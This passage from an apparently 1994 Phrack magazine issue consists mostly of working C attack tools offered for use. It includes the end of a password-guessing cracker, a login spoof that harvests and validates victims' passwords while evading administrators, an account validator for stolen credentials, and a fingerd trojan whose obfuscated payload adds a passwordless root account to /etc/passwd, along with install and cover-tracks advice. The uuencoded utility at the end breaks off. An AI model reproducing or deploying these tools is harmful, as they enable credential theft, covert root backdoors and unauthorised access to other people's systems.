such mode\n"); exit(0); } } /* Get a users information from the password file */ void user_info( void ) { uid = pwentry->pw_uid; gid = pwentry->pw_gid; comment = pwentry->pw_gecos; homedir = pwentry->pw_dir; shell = pwentry->pw_shell; } /* Set the filename of the password file to be used, default is /etc/passwd */ void pwfile_name( void ) { if (pwfile != NULL) setpwfile(pwfile); } /* Burst mode, tries user i.d. & then reverses it as possible passwords on every account found in the password file */ void burst_mode( void ) { pwfile_name(); setpwent(); while ((pwentry = getpwent()) != (struct passwd *) NULL) { logname = pwentry->pw_name; user_info(); try_word( logname ); reverse_word( logname ); } endpwent(); } /* Mini-burst mode, try above combinations as well as other strategies which include adding numbers to the end of the user i.d. to generate passwords or using the comment field information in the password file */ void mini_burst( void ) { pwfile_name(); setpwent(); while ((pwentry = getpwent()) != (struct passwd *) NULL) { logname = pwentry->pw_name; user_info(); word_strat(); } endpwent(); } /* Brute force mode, uses all the above strategies as well using a dictionary file to generate possible passwords */ void brute_force( void ) { pwfile_name(); setpwent(); if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) { printf("Sorry - User unknown\n"); exit(0); } else { user_info(); word_strat(); do_dict(); } endpwent(); } /* Calls the various password guessing strategies */ void word_strat() { try_word( logname ); reverse_word( logname ); add_nums( logname ); do_comment( comment ); } /* Takes the user name as its argument and then generates possible passwords by adding the numbers 0-9 to the end. If the username is greater than 7 characters, don't bother */ void add_nums( char *wd ) { int i; char temp[2], buff[WORDSIZE]; if (strlen(wd) < 8) { for (i = 0; i < 10; i++) { strcpy(buff, wd); sprintf(temp, "%d", i); strcat(wd, temp); try_word( wd ); strcpy(wd, buff); } } } /* Gets info from the 'gecos' comment field in the password file, then process this information generating possible passwords from it */ void do_comment( char *wd ) { FILE *fp; char temp[2], buff[WORDSIZE]; int c, flag; flag = 0; /* Open file & store users gecos information in it. w+ mode allows us to write to it & then read from it. */ if ((fp = fopen("gecos", "w+")) == NULL) { printf("Error writing gecos info\n"); exit(0); } fprintf(fp, "%s\n", wd); rewind(fp); strcpy(buff, ""); /* Process users gecos information, separate words by checking for the ',' field separater or a space. */ while ((c = fgetc(fp)) != EOF) { if (( c != ',' ) && ( c != ' ' )) { sprintf(temp, "%c", c); strncat(buff, temp, 1); } else flag = 1; if ((isspace(c)) || (c == ',') != NULL) { if (flag == 1) { c=fgetc(fp); if ((isspace(c)) || (iscntrl(c) == NULL)) ungetc(c, fp); } try_word(buff); reverse_word(buff); strcpy(buff, ""); flag = 0; strcpy(temp, ""); } } fclose(fp); remove("gecos"); } /* Takes a string of characters as its argument(in this case the login i.d., and then reverses it */ void reverse_word( char *wd ) { char temp[2], buff[WORDSIZE]; int i; i = strlen(wd) + 1; strcpy(temp, ""); strcpy(buff, ""); do { i--; if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) { sprintf(temp, "%c", wd[i]); strncat(buff, temp, 1); } } while(i != 0); if (strlen(buff) > 1) try_word(buff); } /* Read one word at a time from the specified dictionary for use as possible passwords, if dictionary filename is NULL, ignore this operation */ void do_dict( void ) { FILE *fp; char buff[WORDSIZE], temp[2]; int c; strcpy(buff, ""); strcpy(temp, ""); if (dict == NULL) exit(0); if ((fp = fopen(dict, "r")) == NULL) { printf("Error opening dictionary file\n"); exit(0); } rewind(fp); while ((c = fgetc(fp)) != EOF) { if ((c != ' ') || (c != '\n')) { strcpy(temp, ""); sprintf(temp, "%c", c); strncat(buff, temp, 1); } if (c == '\n') { if (buff[0] != ' ') try_word(buff); strcpy(buff, ""); } } fclose(fp); } /* Process the word to be used as a password by stripping \n from it if necessary, then use the pwdauth() function, with the login name and word to attempt to get a valid id & password */ void try_word( char pw[] ) { int pwstat, i, pwlength; char temp[2], buff[WORDSIZE]; strcpy(buff, ""); pwlength = strlen(pw); for (i = 0; i != pwlength; i++) { if (pw[i] != '\n') { strcpy(temp, ""); sprintf(temp, "%c", pw[i]); strncat(buff, temp, 1); } } if (strlen(buff) > 3 ) { printf("Trying : %s\n", buff); if (pwstat = pwdauth(logname, buff) == NULL) { printf("Valid Password! - writing details to 'data'\n"); write_details(buff); if (strcmp(mode, "f") == NULL) exit(0); } } } /* If valid account & password, store this, along with the accounts uid, gid, comment, homedir & shell in a file called 'data' */ void write_details( char *pw ) { FILE *fp; if ((fp = fopen(OUTFILE, "a")) == NULL) { printf("Error opening output file\n"); exit(0); } fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid); fprintf(fp, "%s:%s:%s\n", comment, homedir, shell); fclose(fp); } ---cut here------------------------------------------------------------------- again to compile it do :- $ gcc shcrack.c -o shcrack or $ acc shcrack.c -o shcrack this can vary depending on your compiler. The Ultimate Login Spoof ^^^^^^^^^^^^^^^^^^^^^^^^ Well this subject has been covered many times before but its a while since I have seen a good one, and anyway I thought other unix spoofs have had two main problems :- 1) They were pretty easy to detect when running 2) They recorded any only shit entered..... Well now I feel these problems have been solved with the spoof below. Firstly, I want to say that no matter how many times spoofing is deemed as a 'lame' activity, I think it is very underestimated. When writing this I have considered every possible feature such a program should have. The main ones are :- 1) To validate the entered login i.d. by searching for it in the password file. 2) Once validated, to get all information about the account entered including - real name etc from the comment field, homedir info (e.g. /homedir/miner) and the shell the account is using and store all this in a file. 3) To keep the spoofs tty idle time to 0, thus not to arouse the administrators suspicions. 4) To validates passwords before storing them, on all unshadowed unix systems & SUNOS shadowed/unshadowed systems. 5) To emulates the 'sync' dummy account, thus making it act like the real login program. 6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically quit if it has not grabbed an account within a specified time. 7) To automatically detect & display the hostname before the login prompt e.g. 'ccu login:', this feature can be disabled if desired. 8) To run continuously until a valid i.d. & valid password are entered. As well as the above features, I also added a few more to make the spoof 'foolproof'. At university, a lot of the users have been 'stung' by login spoofs in the past, and so have become very conscious about security. For example, they now try and get around spoofs by entering any old crap when prompted for their login name, or to hit return a few times, to prevent any 'crappy' spoofs which may be running. This is where my spoof shines!, firstly if someone was to enter - login: dhfhfhfhryr Password: into the spoof, it checks to see if the login i.d. entered is valid by searching for it in the password file. If it exists, the spoof then tries to validate the password. If both the i.d. & password are valid, these will be stored in a file called .data, along with additional information about the account taken directly from the password file. Now if, as in the case above, either the login name or password is incorrect, the information is discarded, and the login spoof runs again, waiting for a valid user i.d. & password to be entered. Also, a lot of systems these days have an unpassworded account called 'sync', which when logged onto, usually displays the date & time the sync account was last logged into, and from which server or tty, the message of the day, syncs the disk, and then logs you straight out. A few people have decided that the best way to dodge login spoofs is to first login to this account then when they are automatically logged out, to login to their own account. They do this firstly, so that if a spoof is running it only records the details of the sync account and secondly the spoof would not act as the normal unix login program would, and therefore they would spot it and report it, thus landing you in the shit with the system administrator. However, I got around this problem so that when someone tries to login as sync (or another account of a similar type, which you can define), it acts exactly like the normal login program would, right down to displaying the system date & time as well as the message of the day!! The idle time facility ---------------------- One of the main problems with unix spoofs, is they can be spotted so easily by the administrator, as he/she could get a list of current users on the system and see that an account was logged on, and had been idle for maybe 30 minutes. They would then investigate & the spoof would be discovered. I have therefore incorporated a scheme in the spoof whereby approx. every minute, the tty the spoof is executed from, is 'touched' with the current time, this effectively simulates terminal activity & keeps the terminals idle time to zero, which helps the spoofs chances of not being discovered greatly. The spoof also incorporates a routine which will automatically keep track of approximately how long the spoof has been running, and if it has been running for a specified time without grabbing an i.d. or password, will automatically exit and run the real login program. This timer is by default set to 12.5 minutes, but you can alter this time if you wish. Note: Due to the varying processing power of some systems, I could not set the timer to exactly 60 seconds, I have therefore set it to 50, incase it loses or gains extra time. Take this into consideration when setting the spoofs timer to your own value. I recommend you stick with the default, and under no circumstances let it run for hours. Password Validation techniques ------------------------------ The spoof basically uses 2 methods of password validation(or none at all on a shadowed system V). Firstly, when the spoof is used on any unix with an unshadowed password file, it uses the crypt function to validate a password entered. If however the system is running SUNOS 4.1.+ and incorporates the shadow password system, the program uses a function called pwdauth(). This takes the login i.d. & decrypted password as its arguments and checks to see if both are valid by encrypting the password and comparing it to the shadowed password file which is usually located in /etc/security and accessible only by root. By validating both the i.d. & password we ensure that the data which is saved to file is correct and not any old bullshit typed at the terminal!!! Executing the Spoof ------------------- ok, now about the program. This is written in ANSI-C, so I hope you have a compatible compiler, GCC or suns ACC should do it. Now the only time you will need to change to the code is in the following circumstances :- 1) If you are to compile & run it on an unshadowed unix, in which case remove all references to the pwdauth() function, from both the declarations & the shadow checking routine, add this code in place of the shadow password checking routine :- if ( shadow == 1 ) { invalid = 0; else invalid = 1; } 2) Add the above code also to the spoof if you are running this on a system V which is shadowed. In this case the spoof loses its ability to validate the password, to my knowledge there is no sysV equivalent of the pwdauth() function. Everything else should be pretty much compatible. You should have no problems compiling & running this on an unshadowed SUNOS machine, if you do, make the necessary changes as above, but it compiled ok on every unshadowed SUNOS I tested it on. The Spoof should automatically detect whether a SUNOS system is shadowed or unshadowed and run the appropriate code to deal with each situation. Note: when you have compiled this spoof, you MUST 'exec' it from the current shell for it to work, you must also only have one shell running. e.g. from C or Bourne shell using the GNU C Compiler do :- $ gcc spoof.c -o spoof $ exec spoof This replaces the current shell with the spoof, so when the spoof quits & runs the real login program, the hackers account is effectively logged off. ok enough of the bullshit, here's the spoof :- ----------cut here------------------------------------------------------- /* Program : Unix login spoof Author : The Shining/UPi (UK Division) Date : Released 12/4/94 Unix Type : All unshadowed unix systems & shadowed SUNOS systems Note : This file MUST be exec'd from the shell. */ #include #include #include #include #include #include #define OUTFILE ".data" /* Data file to save account info into */ #define LOGPATH "/usr/bin/login" /* Path of real login program */ #define DUMMYID "sync" /* Dummy account on your system */ #define DLENGTH 4 /* Length of dummy account name */ FILE *fp; /* Set up variables to store system time & date */ time_t now; static int time_out, time_on, no_message, loop_cnt; /* Set up a structure to store users information */ struct loginfo { char logname[10]; char key[9]; char *comment; char *homedir; char *shell; } u; /* Use the unix function getpass() to read user password and crypt() or pwdauth() (remove it below if not SUNOS) to validate it etc */ char *getpass(), *gethostname(), *alarm(), *sleep(), *crypt(), *ttyname(), *pwdauth(), motd, log_date[60], pass[14], salt[3], *tty, cons[] = " on console ", hname[72], *ld; /* flag = exit status, ppid = pid shell, wait = pause length, pwstat = holds 0 if valid password, shadow holds 1 if shadow password system is being used, 0 otherwise. */ int flag, ppid, wait, pwstat, shadow, invalid; /* Declare main functions */ void write_details(struct loginfo *); void catch( void ), disable_interrupts( void ); void log_out( void ), get_info( void ), invalid_login( void ), prep_str( char * ); /* set up pointer to point to pwfile structure, and also a pointer to the utime() structure */ struct passwd *pwentry, *getpwnam(); struct utimbuf *times; int main( void ) { system("clear"); /* Initialise main program variables to 0, change 'loop_cnt' to 1 if you do not want the machines host name to appear with the login prompt! (e.g. prompt is `login:` instead of 'MIT login:' etc) */ wait = 3; /* Holds value for pause */ flag = 0; /* Spoof ends if value is 1 */ loop_cnt = 0; /* Change this to 1 if no host required */ time_out = 0; /* Stops timer if spoof has been used */ time_on = 0; /* Holds minutes spoof has been running */ disable_interrupts(); /* Call function to disable Interrupts */ /* Get system time & date and store in log_date, this is displayed when someone logs in as 'sync' */ now = time(NULL); strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now)); strcat(log_date, cons); ld = log_date; /* Get Hostname and tty name */ gethostname(hname, 64); strcat(hname, " login: "); tty = ttyname(); /* main routine */ while( flag == 0 ) { invalid = 0; /* Holds 1 if id +/or pw are invalid */ shadow = 0; /* 1 if shadow scheme is in operation */ no_message = 0; /* Flag for Login Incorrect msg */ alarm(50); /* set timer going */ get_info(); /* get user i.d. & password */ /* Check to see if the user i.d. entered is 'sync', if it is display system time & date, display message of the day and then run the spoof again, insert the account of your choice here, if its not sync, but remember to put the length of the accounts name next to it! */ if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) { printf("%s\n", ld); if ((fp = fopen("/etc/motd", "r")) != NULL) { while ((motd = getc(fp)) != EOF) putchar(motd); fclose(fp); } printf("\n"); prep_str(u.logname); no_message = 1; sleep(wait); } /* Check if a valid user i.d. has been input, then check to see if the password system is shadowed or unshadowed. If both the user i.d. & password are valid, get additional info from the password file, and store all info in a file called .data, then exit spoof and run real login program */ setpwent(); /* Rewind pwfile to beign processing */ if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) { invalid = 1; flag = 0; } else strncpy(salt, pwentry->pw_passwd, 2); /* Check for shadowed password system, in SUNOS, the field in /etc/passwd should begin with '##', in system V it could contain an 'x', if none of these exist, it checks that the entry = 13 chars, if less then shadow system will probably be implemented (unless acct has been disabled) */ if ( invalid == 0 ) { if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL) shadow = 1; else if (strlen(pwentry->pw_passwd) < 13) shadow = 1; /* If unshadowed, use the salt from the pwfile field & the key to form the encrypted password which is checked against the entry in the password file, if it matches, then all is well, if not, spoof runs again!! */ if ( shadow != 1 ) { if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL) invalid = 0; else invalid = 1; } /* If SUNOS Shadowing is in operation, use the pwdauth() function to validate the password, if not SUNOS, substitute this code with the routine I gave earlier! */ if ( shadow == 1 ) { if (pwstat = pwdauth(u.logname, u.key) == NULL) invalid = 0; else invalid = 1; } } /* If we have a valid account & password, get user info from the pwfile & store it */ if ( invalid == 0 ) { u.comment = pwentry->pw_gecos; u.homedir = pwentry->pw_dir; u.shell = pwentry->pw_shell; /* Open file to store user info */ if ((fp = fopen(OUTFILE, "a")) == NULL) log_out(); write_details(&u); fclose(fp); no_message = 1; flag = 1; } else flag = 0; invalid_login(); endpwent(); /* Close pwfile */ if (no_message == 0) loop_cnt++; } /* end while */ log_out(); /* call real login program */ } /* Function to read user i.d. & password */ void get_info( void ) { char user[11]; unsigned int string_len; fflush(stdin); prep_str(u.logname); prep_str(u.key); strcpy(user, "\n"); /* Loop while some loser keeps hitting return when asked for user i.d. and if someone hits CTRL-D to break out of spoof. Enter a # at login to exit spoof. Uncomment the appropriate line(s) below to customise the spoof to look like your system */ while ((strcmp(user, "\n") == NULL) && (!feof(stdin))) { /* printf("Scorch Ltd SUNOS 4.1.3\n\n); */ if (loop_cnt > 0) strcpy(hname, "login: "); printf("%s", hname); fgets(user, 9, stdin); /* Back door for hacker, # at present, can be changed, but leave \n in. */ if (strcmp(user, "#\n") == NULL) exit(0); /* Strip \n from login i.d. */ if (strlen(user) < 8) string_len = strlen(user) - 1; else string_len = strlen(user); strncpy(u.logname, user, string_len); /* check to see if CTRL-D has occurred because it does not generate an interrupt like CTRL-C, but instead generates an end-of-file on stdin */ if (feof(stdin)) { clearerr(stdin); printf("\n"); } } /* Turn off screen display & read users password */ strncpy(u.key, getpass("Password:"), 8); } /* Function to increment the timer which holds the amount of time the spoof has been running */ void catch( void ) { time_on++; /* If spoof has been running for 15 minutes, and has not been used, stop timer and call spoof exit routine */ if ( time_out == 0 ) { if (time_on == 15) { printf("\n"); alarm(0); log_out(); } } /* 'Touch' your tty, effectively keeping terminal idle time to 0 */ utime(tty, times); alarm(50); } /* Initialise a string with \0's */ void prep_str( char str[] ) { int strl, cnt; strl = strlen(str); for (cnt = 0; cnt != strl; cnt++) str[cnt] = ' '; } /* function to catch interrupts, CTRL-C & CTRL-Z etc as well as the timer signals */ void disable_interrupts( void ) { signal(SIGALRM, catch); signal(SIGQUIT, SIG_IGN); signal(SIGTERM, SIG_IGN); signal(SIGINT, SIG_IGN); signal(SIGTSTP, SIG_IGN); } /* Write the users i.d., password, personal information, homedir and shell to a file */ void write_details(struct loginfo *sptr) { fprintf(fp, "%s:%s:", sptr->logname, sptr->key); fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid); fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir); fprintf(fp, "%s\n", sptr->shell); fprintf(fp, "\n"); } /* Display login incorrect only if the user hasn't logged on as 'sync' */ void invalid_login( void ) { if ( flag == 1 && pwstat == 0 ) sleep(wait); if ( no_message == 0 ) printf("Login incorrect\n"); } /* Displays appropriate message, exec's the real login program, this replaces the spoof & effectively logs spoof's account off. Note: this spoof must be exec'd from the shell to work */ void log_out( void ) { time_out = 1; if ( no_message == 1 ) { sleep(1); printf("Login incorrect\n"); } execl(LOGPATH, "login", (char *)0); } ----------cut here------------------------------------------------------- then delete the source, run it and wait for some sucker to login!. If you do initially run this spoof from your account, I suggest you remove it when you have grabbed someone's account and run it from theirs from then on, this reduces your chances of being caught! User i.d. & Password Validator ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Now if you are familiar with the unix Crack program, as I'm sure most of you are ;-), or if you have used my spoof to grab some accounts, this little program could be of some use. Say you have snagged quit a few accounts, and a few weeks later you wanna see if they are still alive, instead of logging onto them, then logging out again 20 or 30 times which can take time, and could get the system admin looking your way, this program will continuously ask you to enter a user i.d. & password, then validate them both by actually using the appropriate entry in the password file. All valid accounts are then stored along with other info from the password file, in a data file. The program loops around until you stop it. This works on all unshadowed unix systems, and, you guessed it!, shadowed SUNOS systems. If you run it on an unshadowed unix other than SUNOS, remove all references to pwdauth(), along with the shadow password file checking routine, if your on sysV, your shit outa luck! anyway, here goes :- ---cut here--------------------------------------------------------------- /* Program : To validate accounts & passwords on both shadowed & unshadowed unix systems. Author : The Shining/UPi (UK Division) Date : Released 12/4/94 UNIX type : All unshadowed systems, and SUNOS shadowed systems */ #include #include #include FILE *fp; int pw_system( void ), shadowed( void ), unshadowed( void ); void write_info( void ), display_notice( void ); struct passwd *pwentry, *getpwnam(); struct user { char logname[10]; char key[9]; char salt[3]; } u; char *getpass(), *pwdauth(), *crypt(), ans[2]; int invalid_user, stat; int main( void ) { strcpy(ans, "y"); while (strcmp(ans, "y") == NULL) { invalid_user = stat = 0; display_notice(); printf("Enter login id:"); scanf("%9s", u.logname); strcpy(u.key, getpass("Password:")); setpwent(); if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) invalid_user = 1; else strncpy(u.salt, pwentry->pw_passwd, 2); if (invalid_user != 1) { if ((stat = pw_system()) == 1) { if ((stat = unshadowed()) == NULL) { printf("Unshadowed valid account! - storing details\n"); write_info(); } } else if ((stat = shadowed()) == NULL) { printf("SUNOS Shadowed valid account! - storing details\n"); write_info(); } else invalid_user = 2; } if (invalid_user == 1) printf("User unknown/not found in password file\n"); if (invalid_user == 2 ) printf("Password invalid\n"); printf("\n\nValidate another account?(y/n): "); scanf("%1s", ans); endpwent(); } } /* Check to see if shadow password system is used, in SUNOS the field in /etc/passwd starts with a '#', if not, check to see if entry is 13 chars, if not shadow must be in use. */ int pw_system( void ) { if (strlen(pwentry->pw_passwd) != 13) return(0); else if (strcmp(u.salt, "##") == NULL) return(0); else return(1); } /* If system is unshadowed, get the 2 character salt from the password file, and use this to encrypt the password entered. This is then compared against the password file entry. */ int unshadowed( void ) { if (pwentry->pw_passwd == crypt(u.key, u.salt)) return(0); else return(1); } /* If SUNOS shadowe system is used, use the pwdauth() function to validate the password stored in the /etc/security/passwd.adjunct file */ int shadowed( void ) { int pwstat; if (pwstat = pwdauth(u.logname, u.key) == NULL) return(0); else return(1); } /* Praise myself!!!! */ void display_notice( void ) { system("clear"); printf("Unix Account login id & password validator.\n"); printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n"); printf("(c)1994 The Shining\n\n\n\n"); } /* Open a file called 'data' and store account i.d. & password along with other information retrieved from the password file */ void write_info( void ) { /* Open a file & store account information from pwfile in it */ if ((fp = fopen("data", "a")) == NULL) { printf("error opening output file\n"); exit(0); } fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry->pw_uid); fprintf(fp, "%d:%s:", pwentry->pw_gid, pwentry->pw_gecos); fprintf(fp, "%s:%s\n", pwentry->pw_dir, pwentry->pw_shell); fclose(fp); } -----cut here------------------------------------------------------------------ The above programs will not compile under non-ansi C compilers without quite a bit of modification. I have tested all these programs on SUNOS both shadowed & unshadowed, though they should work on other systems with little modification (except the shadow password cracker, which is SUNOS shadow system specific). Regards to the following guys :- Archbishop & The Lost Avenger/UPi, RamRaider/QTX, the guys at United International Perverts(yo Dirty Mac & Jasper!) and all I know. (c) 1994 The Shining (The NORTH!, U.K.) ******************************************************************************* ==Phrack Magazine== Volume Five, Issue Forty-Six, File 12 of 28 **************************************************************************** The fingerd trojan horse Original article by Hitman Italy for Phrack Inc. This article is for informational purpose only, I'm not liable for any damage or illegal activity perpetrated using the source or the informations in the article. -=- + - So you have gained access to a system and want to keep on hacking without being kicked off by a smart operator, there are dozen methods you can use, usually, if an operator figure out that his system is under attack, he'll check out the login program and telnetd for backdoors, then the telnet for logging activities or network sniffers and so on.. if nothing is found he'll realize the hacker is a dumb ass and he'll just modify the passwd to prevent him from logging on (in most cases), here comes my fingerd trojan. This scheme is quite original (I've never seen it used) and the source is compact enough to be fitted into a MAG. The fingerd as all you know (I hope) is the finger server run by inetd when a client opens the finger port (N.79), of course if the port is locked, or you have a network firewall, do not use this code. ---------- + CUT HERE + ----------------------------------------------- /* The Fingerd trojan by Hitman Italy * This source cannot be spread without the whole article * but you can freely implement or modify it for personal use */ static char copyright[] = ""; /* Add the copyright string here */ static char sccsid[] = ""; /* Add the sccsid string here */ #include #define PATH_FINGER "/usr/ucb/finger" #define CODE 161 char *HitCrypt(ch) char *ch; { char *b; b=ch; while ((*(ch++)^=CODE)!=0x00); return(b); } main(argc,argv) int argc; char *argv[]; { register FILE *fp; register int ch; register char *lp; int p[2]; static char exor[4][23]={ {201,200,213,CODE}, {142,196,213,194,142,209,192,210,210,214,197,CODE}, {201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194, 210,201,CODE}, {227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197, 143,143,143,CODE} }; #define ENTRIES 50 char **ap, *av[ENTRIES + 1], line[1024], *strtok(); #ifdef LOGGING /* unused, leave it for "strings" command */ #include struct sockaddr_in sin; int sval; sval = sizeof(sin); if (getpeername(0, &sin, &sval) < 0) fatal(argv[0],"getpeername"); #endif if (!fgets(line, sizeof(line), stdin)) exit(1); av[0] = "finger"; for (lp = line, ap = &av[1];;) { *ap = strtok(lp, " \t\r\n"); if (!*ap) break; if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w')) *ap = "-l"; if (++ap == av + ENTRIES) break; lp = NULL; } if (pipe(p) < 0) fatal(argv[0],"pipe"); switch(fork()) { case 0: (void)close(p[0]); if (p[1] != 1) { (void)dup2(p[1], 1); (void)close(p[1]); } /*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/ if (av[1]) if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) { if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a"))) _exit(10); fprintf(fp,"%s\n", HitCrypt(&exor[2][0])); printf("%s\n", HitCrypt(&exor[3][0])); fclose(fp); break; } /*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/ if (execv(PATH_FINGER, av)==-1) fprintf(stderr,"No local finger program found\n"); _exit(1); case -1: fatal(argv[0],"fork"); } (void)close(p[1]); if (!(fp = fdopen(p[0], "r"))) fatal(argv[0],"fdopen"); while ((ch = getc(fp)) != EOF) { putchar(ch); } exit(0); } fatal(prg,msg) char *prg,*msg; { fprintf(stderr, "%s: ", prg); perror(msg); exit(1); } --------- + CUT HERE + ---------------------------------------------- I think it's quite easy to understand, first of all, inetd opens the socket and pipes the the input data through the fingerd * if (!fgets(line, sizeof(line), stdin)) * exit(1); * av[0] = "finger"; * for (lp = line, ap = &av[1];;) { * *ap = strtok(lp, " \t\r\n"); * if (!*ap) * break; * if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w')) * *ap = "-l"; here it gets the data from stdin and parses them (strtok) converting (due to RFC742) any '/W' or '/w' old options in '-l' * switch(fork()) { * case 0: * (void)close(p[0]); * if (p[1] != 1) { * (void)dup2(p[1], 1); * (void)close(p[1]); * } the task goes into the background * if (execv(PATH_FINGER, av)==-1) * fprintf(stderr,"No local finger program found\n"); here the daemon executes the local finger with remote parameters * (void)close(p[1]); * if (!(fp = fdopen(p[0], "r"))) * fatal(argv[0],"fdopen"); * while ((ch = getc(fp)) != EOF) { * putchar(ch); the output is piped back to the remote system That's how the finger daemon works... now the trojan, basically we'll check out the input finger user till the magic code matches, then our sleepin' trojan will wake up and do the job... let's examine my code (decrypted) /*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/ if (av[1]) if (strcmp("hit",av[1])==0) { if(!(fp=fopen("/etc/passwd","a"))) _exit(10); fprintf(fp,"hit::0:0::/:/bin/csh\n"); printf("Backdoor activated...\n"); fclose(fp); break; } /*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/ When the "hit" magic code matches the trojan will modify the passwd adding a fake unpassworded root user named "hit", so you can relogin as root, cover your tracks and keep on working. Of course this is an example, you can do what you want simply adding your custom code, you may remote cat a log file without logging in, or remote kill an user, maybe root logins are disabled so you have to make a suid shell and add a normal entry in the passwd or open a port and so on, you can also use multiple codes if you like. If the magic word doesn't match of course the finger will work out normally. # finger hit@666.666.666.666 [666.666.666.666] Backdoor activated... Well done! You have gained a root access. (...) # cat /etc/passwd root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh nobody:*:65534:65534::/: daemon:*:1:1::/: sys:*:2:2::/:/bin/csh bin:*:3:3::/bin: uucp:*:4:8::/var/spool/uucppublic: news:*:6:6::/var/spool/news:/bin/csh ingres:*:7:7::/usr/ingres:/bin/csh audit:*:9:9::/etc/security/audit:/bin/csh sync::1:1::/:/bin/sync ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh +::0:0::: hit::0:0::/:/bin/csh ^^^ they run NIS... anyway our local root login will work fine #finger hit@hacked.system.com [hacked.system.com] here is the log user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001 user: yit001 from: (...) That's really useful to collect logfiles without logging in and leave tracks everywhere. Now the problem.... If you want to use the fingerd to run world accessible commands you won't have any problem but if you require root privileges check this out: #grep fingerd /etc/inetd.conf finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd ^^^^^^ On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with NFS etc..), as nobody of course you cannot modify the passwd, so edit the file finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd now you have to refesh the inetd process #kill -HUP now you can do what you want, many unix clones let the fingerd running as root by default... and even if you have to modify the inetd.conf an operator unlikely will realize what is appening since all other daemons run as root. Why have I crypted all data? #strings login (...) Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...) Lame or not? All alien data must be crypted.. a fast exor crypting routine will work fine, of course you can use the standard crypt function or other (slow) algorithms but since security is not important (we just want to make our texts invisible) I suggest using my fast algo,to create the exor matrix simply put all texts on a file and use the little ExorCrypt utility I have included UUencoded below (amiga/msdos version). echo > test "this is a test" Acrypt test test.o line crypted: 1 type test.o static char exor[]={ 213,201,200,210,129,200,210,129,192,129,213,196,210,213,161}; char *ExorCrypt(ch) char *ch; { char *b; b=ch; while ((*(ch++)^=0xa1)!=0x00); return(b); } The utility will create the exor vector (matrix) (from the 80 column formatted ascii input text) and the specific decoding function, If you do not supply a key "$a1" will be used, remember to add a NewLine if necessary, the vector/matrix never contain them. Before compiling the whole thing you must add the copyright and sccsid strings I have not included (they may vary). Let's simply do: (SunOs) #strings /usr/etc/in.fingerd @(#) Copyright (c) 1983 Regents of the University of California. All rights reserved. ^^^^ COPYRIGHT STRING @(#)in.fingerd.c 1.6 88/11/28 SMI <<<< SCCSID STRING getpeername finger pipe /usr/ucb/finger No local finger program found fork fdopen %s: ((((( DDDDDDDDDD AAAAAA BBBBBB The top of source becomes: static char copyright[]= "@(#) Copyright (c) 1983 Regents of the University of California.\n\ All rights reserverd.\n"; static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI" That's all. Now you can compile and install your fingerd trojan, the source was adapted for SunOS but you can port it on many unix clones without troubles. Few final words to: Operators: How to defeat this trojan? First of all check the inetd.conf, then do VARIOUS fingerd checksums (maybe even the "sum" command is a trojan :) if you discover the trojan wrap the finger port so you can track down the hacker (usually all wtmp/lastlog logs are removed) or wrap everything modifying the daemons, do NOT use the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd tripwire entry to prevent future installations. Well... if the hacker is a good one everything is useless. Beginners: You must be root to install the trojan, remember to get a copy of the original fingerd program before installing the fake version. On a Sun do: #cc -o in.fingerd trojan.c #mv /usr/etc/in.fingerd fingerd.old #mv in.fingerd /usr/etc remember to check the /etc/inetd.conf -=- + - To get in touch with me send E-Mail to: Internet: hit@bix.com X.25: QSD Nua (0)208057040540 Mbx: Hitman_Italy if you want, use my PGP key -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a.2 mQCNAiypAuIAAAEEALVTvHLl4zthwydN+3oydNj7woyoKBpi1wBYnKJ4OGFa/KT3 faERV90ifxTS73Ec9pYhS/GSIRUVuOGwahx2UD0HIDgXnoceRamhE1/A9FySImJe KMc85+nvDuZ0THMbx/W+DDHJMR1Rp2nBzVPMGEjixon02nE/5xrNm/sb/cUdAAUR tBpIaXRtYW4gSXRhbHkgPGhpdEBiaXguY29tPg== =bCu4 -----END PGP PUBLIC KEY BLOCK----- ExorCrypt Amiga version: -=) S.Encode v2.5 (=- begin 777 Acrypt.lha M'$0M;&@U+;L7``"`*```4K>9`0``!D%C]8TV]?OWWGY]h MWCGT)T<>==;,3^G7FQMOA\XXX4Q2S[GS9)QP]W.-A<]))-Y@SN9!MOMPPCA"h MGWF(`+"*XDE5UEU4LU45L4CDCA958FA%94*5RX4P217"J%868`=M85QPS1@YL*2RW3+[;9:U9+);_%OP`;\%'W=VLD<;;A%.>^3?Y5SVH19P?5/Zh 